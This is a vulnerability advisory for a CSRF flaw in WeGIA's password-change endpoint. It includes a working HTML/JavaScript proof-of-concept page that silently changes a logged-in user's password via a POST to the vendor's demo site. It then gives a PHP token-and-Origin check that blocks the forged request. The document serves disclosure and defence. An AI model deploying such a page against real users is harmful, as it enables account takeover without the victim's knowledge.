CVE-2024-53472

CSRF

CVE-2024-53472: CSRF in control.php to change password

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2024-53472

Vendor

WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions.

https://www.wegia.org

https://sol.sbc.org.br/index.php/latinoware/article/view/31544

Affected Product Code Base

WeGIA < v3.2.0

Vulnerability Description

A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.

POC

When a user who is logged into the application loads the malicious page below, the code changes that user's password without their consent.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit</title>
</head>
<body>
    <script>
        fetch("https://demo.wegia.org/controle/control.php", {
            method: "POST",
            headers: {
                "Content-Type": "application/x-www-form-urlencoded",
            },
            body: "senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"
        })
        .then(response => response.text())
        .then(data => console.log(data))
        .catch(error => console.error('Error:', error));
    </script>
</body>
</html>

Reference

https://www.cve.org/CVERecord?id=CVE-2024-53472

Solution

https://github.com/nilsonLazarin/WeGIA/issues/790
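
A synchronizer-token and Origin check of the kind that refuses the request shown in the POC, as an added example; it is not WeGIA's code and not the fix from the linked issue. The function names, the `csrf_token` field and the `TRUSTED_ORIGIN` constant are assumptions, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical guard for a state-changing endpoint such as
// controle/control.php. Names below are assumptions, not WeGIA identifiers.
const TRUSTED_ORIGIN = 'https://demo.wegia.org'; // host taken from the POC URL

// Issue one random token per session; the password form embeds it as a hidden field.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True when the request must be refused before any controller method runs.
function isForgedRequest(array $server, array $post, array $session): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return true; // state changes are accepted over POST only
    }
    $origin = $server['HTTP_ORIGIN'] ?? '';
    if ($origin !== '' && $origin !== TRUSTED_ORIGIN) {
        return true; // the browser reports that another site issued the request
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // A cross-site page cannot read the session's token, so it cannot supply it.
    return $expected === '' || !is_string($supplied) || !hash_equals($expected, $supplied);
}

// --- Constructed requests for demonstration ---
$session = [];
$token = csrfToken($session);

// Body exactly as in the POC, arriving from a foreign origin and without a token.
parse_str('senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle'
    . '&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar', $forged);
$forgedServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://attacker.example'];

// Same fields submitted by the application's own form, which carries the token.
$legit = $forged + ['csrf_token' => $token];
$legitServer = ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => TRUSTED_ORIGIN];

printf("POC request refused: %s\n", var_export(isForgedRequest($forgedServer, $forged, $session), true));
printf("Own form refused:    %s\n", var_export(isForgedRequest($legitServer, $legit, $session), true));
```

In a real deployment `$session`, `$post` and `$server` would be `$_SESSION`, `$_POST` and `$_SERVER`, with the check run before the requested class and method are dispatched.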

Discoverer

Natan Maia Morette

Contributor

Diego Cardoso Borda Castro

By: CVE-Hunters
